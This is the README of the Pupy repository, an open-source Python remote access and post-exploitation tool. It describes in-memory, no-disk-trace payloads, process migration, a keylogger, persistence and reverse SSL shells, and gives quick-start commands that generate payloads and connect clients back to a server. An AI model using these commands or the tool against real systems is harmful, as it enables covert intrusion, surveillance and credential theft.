Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python
Go to file
n1nj4sec a66c52d56e README updated 2015-09-22 19:26:14 +02:00
client first commit :-) 2015-09-22 19:25:36 +02:00
docs/screenshots README updated 2015-09-22 19:26:14 +02:00
pupy first commit :-) 2015-09-22 19:25:36 +02:00
.gitignore updated README 2015-09-22 19:26:14 +02:00
LICENSE updated README 2015-09-22 19:26:14 +02:00
README.md README updated 2015-09-22 19:26:14 +02:00

README.md

Pupy

Pupy is an opensource RAT (Remote Administration Tool) written in Python. Pupy uses reflective dll injection and leaves no traces on disk.

Features :

  • On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
  • Pupy can reflectively migrate into other processes
  • Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).
  • modules are quite simple to write and pupy is easily extensible.
  • Pupy uses rpyc (https://github.com/tomerfiliba/rpyc) and a module can directly access python objects on the remote client
    • we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
  • communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future
  • all the non interactive modules can be dispatched on multiple hosts in one command
  • Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
  • modules can be executed as background jobs
  • commands and scripts running on remote hosts are interruptible
  • auto-completion and nice colored output :-)
  • commands aliases can be defined in the config

Implemented Modules :

  • migrate (windows only)
    • inter process architecture injection also works (x86->x64 and x64->x86)
  • keylogger (windows only)
  • persistence (windows only)
  • screenshot (windows only)
  • command execution
  • download
  • upload
  • socks5 proxy
  • interactive shell (cmd.exe, /bin/sh, ...)
  • interactive python shell

##Quick start In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)

generate/run a payload

for Windows

./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe

for Linux

pip install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

for MAC OS X

easy_install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

having fun

  1. eventually edit pupy.conf to change the bind address / port
  2. start the pupy server :
./pupysh.py
  1. type "clients" to display connected clients

Some screenshots

#####list connected clients screenshot1 #####help screenshot3 #####execute python code on all clients screenshot2 #####execute a command on all clients, exception is retrieved in case the command does not exists screenshot4 #####use a filter to send a module only on selected clients screenshot5 #####migrate into another process screenshot6 #####interactive shell screenshot7 #####interactive python shell screenshot8

Dependencies

rpyc (https://github.com/tomerfiliba/rpyc)

##Roadmap and ideas Some ideas without any priority order

  • support for https proxy
  • add offline options to payloads like enable/disable certificate checking, embbed offline modules (persistence, keylogger, ...), etc...
  • integrate scapy in the windows dll :D (that would be fun)
  • work on stealthiness and modules under unix systems
  • webcam snap
  • mic recording
  • socks5 udp support
  • local/remote port forwarding
  • ...
  • any cool idea ?

Contact

mail: contact@n1nj4.eu

If some of you want to participate or send me a feedback, don't hesitate :-)
Follow me on twitter